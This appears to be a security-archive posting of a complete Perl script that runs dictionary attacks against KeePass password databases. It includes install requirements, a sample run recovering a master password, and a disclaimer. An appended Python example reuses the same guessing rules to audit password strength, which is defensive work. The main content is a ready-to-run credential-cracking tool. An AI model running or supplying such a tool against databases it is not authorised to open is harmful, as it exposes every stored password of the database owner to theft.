KeePass Simple Dictionary Password Enumerator
Posted Apr 4, 2018
Authored by Todor Donev

This is a simple Perl script to perform dictionary attacks against the KeePass password manager.

tags | cracker, perl
MD5 | e2e787dabb8d179b58974a368b36d65f

#!/usr/bin/perl
#
# KeePass simple dictionary password enumerator
#
# Copyright 2018 (c) Todor Donev <todor.donev at gmail.com>
# https://ethical-hacker.org/
# https://facebook.com/ethicalhackerorg
#
# KeePass is a free open source password manager,
# which helps you to manage your passwords in a
# secure way. You can put all your passwords in one
# database, which is locked with one master key or
# a key file. So you only have to remember one single
# master password or select the key file to unlock
# the whole database. The databases are encrypted
# using the best and most secure encryption algorithms
# currently known (AES and Twofish).
#
# Description:
# Dictionary Attacks are a method of using a program
# to try a list of words on the interface or program
# that is protecting the area that you want to gain
# access to. The most simple password crackers using
# dictionary attacks use a list of common single words,
# aka a "dictionary". More advanced programs often use
# a dictionary on top of mixing in numbers or common
# symbols at the beginning or end of the guessed words.
# Some can even be given a set of personal information
# or a profile of the user and pick out important words
# to guess, even if they are not proper words, such as
# proper nouns like last names and names of relatives.
# A weakness of dictionary attacks is that they obviously
# rely on words supplied by a user, typically real words,
# to function. If the password is misspelled, is in another
# language, or very simply uses a word that is not in the
# dictionary or profile, it cannot succeed. Most of the
# time, even using two words in one password can thwart
# a dictionary attack.
#
#
# [todor@paladium ~]$ perl keepass.pl NewDatabase.kdbx wordlist.txt
# [+] KeePass simple dictionary password enumerator
# [*] ======
# [?] Trying admin
# [?] Trying 123456dqwdqwd
# [?] Trying dhasdasdasdadasdassfsadfdsf
# [?] Trying adsfdasdasdasdasd
# [?] Trying sdafqwdqwdqw
# [?] Trying sdadqwdqwdqdqw
# [?] Trying fi3oj12gyu3123oiu1298ud89asuda9sduas98duas
# [?] Trying sadfd87asdyhoijwqd98asud8asd
# [?] Trying sadka98sud89asud98asdhjasidasodll
# [?] Trying gfdkasjiohduiasdhaod
# [?] Trying wdpasi9ud8uas7dhuasid
# [?] Trying 3qgpdokasijdhuaygdqhwoidjpasjd
# [?] Trying ewgdasdasdczxczxc
# [?] Trying weczcxcasascsdvsdgdsfhsgfhdfd
# [?] Trying gwehdfhfghergrwegagdsgdfgdfsgdfgsd
# [?] Trying ggdsgdsfgdsfgdsfgsdf
# [?] Trying gdfsgsddwqdqwdqwd
# [*] ======
# [!] Author: Todor Donev <todor.donev at gmail.com>
# [!] https://ethical-hacker.org/
# [!] https://fb.com/ethicalhackerorg
# [*] ======
# [*] Password for NewDatabase.kdbx is Ethical-Hacker-Bulgaria-2o18
#
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# Requirements:
# cpan install XML::Parser
# cpan install Crypt::Rijndael
# cpan install File::KeePass
#

use warnings;
use strict;
use File::KeePass;
use open ':std', ':encoding(UTF-8)';

my $k = File::KeePass->new;
my ($p, $w) = @ARGV;
print "[+] KeePass simple dictionary password enumerator\n";
&banner and die "[!] Usage: perl $0 <Keepass DBv1 or DBv2> <Wordlist>" if @ARGV != 2;

# Check that the database file can be opened and is not empty.
open(my $db_fh, '<', $p) or die "[-] Error: $p $!";
die "[-] Error: The database is empty." if (-z $p);
close($db_fh);

# Read the whole wordlist into memory, one candidate per line.
open(my $wl_fh, '<', $w) or die "[-] Error: $w $!";
die "[-] Error: Wordlist is empty" if (-z $w);
my @file = <$wl_fh>;
print "[*] ======\n";
foreach my $c (@file) {
    chomp $c;
    # eval traps the exception raised when the candidate does not open the database.
    if (! eval { $k->load_db($p, $c) }) {
        print "[?] Trying $c\n";
    } else {
        &banner and die "[*] Password for $p is $c\n";
    }
}
close($wl_fh);
&banner and die "[-] Sorry, $@";

sub banner {
    print "[*] ======\n";
    print "[!] Author: Todor Donev <todor.donev at gmail.com>\n";
    print "[!] https://ethical-hacker.org/\n";
    print "[!] https://fb.com/ethicalhackerorg\n";
    print "[*] ======\n";
}
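
The guessing strategies described in the script's header (plain wordlist, digits or symbols at either end, profile words) can be turned around into a master-password audit. The following is an added example, not part of Todor Donev's script; it goes beyond the text by also flagging concatenations of known words, and the wordlist, profile terms and function names are constructed for illustration.

```python
import string

# Constructed sample lists; a real audit would load the wordlists in common use.
WORDLIST = {"admin", "password", "dragon", "keepass", "letmein", "hacker"}
PROFILE = {"alice", "sofia"}  # hypothetical personal terms (names, places)

# Characters a guesser typically mixes in at the beginning or end of a word.
AFFIX_CHARS = string.digits + string.punctuation


def split_known(text, known):
    """Return True if `text` is a concatenation of two or more known words."""
    # reach[i] is True when text[:i] can be built entirely from known words.
    reach = [True] + [False] * len(text)
    for end in range(1, len(text) + 1):
        reach[end] = any(reach[start] and text[start:end] in known
                         for start in range(end))
    return len(text) > 0 and reach[len(text)] and text not in known


def classify(candidate, wordlist=WORDLIST, profile=PROFILE):
    """Name the cheapest guessing strategy that finds `candidate`, or None."""
    known = wordlist | profile
    lowered = candidate.lower()
    if lowered in wordlist:
        return "dictionary word"
    if lowered in profile:
        return "profile word"
    # Drop leading and trailing digits/symbols, e.g. "Dragon2018!" -> "dragon".
    core = lowered.strip(AFFIX_CHARS)
    if not core:
        return "digits/symbols only"
    if core in known:
        return "known word with digit/symbol affix"
    # Remove separators so "alice-sofia" is tested as "alicesofia".
    joined = "".join(ch for ch in core if ch not in AFFIX_CHARS)
    if split_known(joined, known):
        return "combination of known words"
    return None


if __name__ == "__main__":
    for pw in ("admin", "Dragon2018!", "alice-sofia", "123456",
               "Ethical-Hacker-Bulgaria-2o18"):
        print(f"{pw!r}: {classify(pw) or 'not covered by these strategies'}")
```

A result of `None` only means the candidate is outside these lists and rules; the sample run in the header recovered its password because that exact string was in the wordlist.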
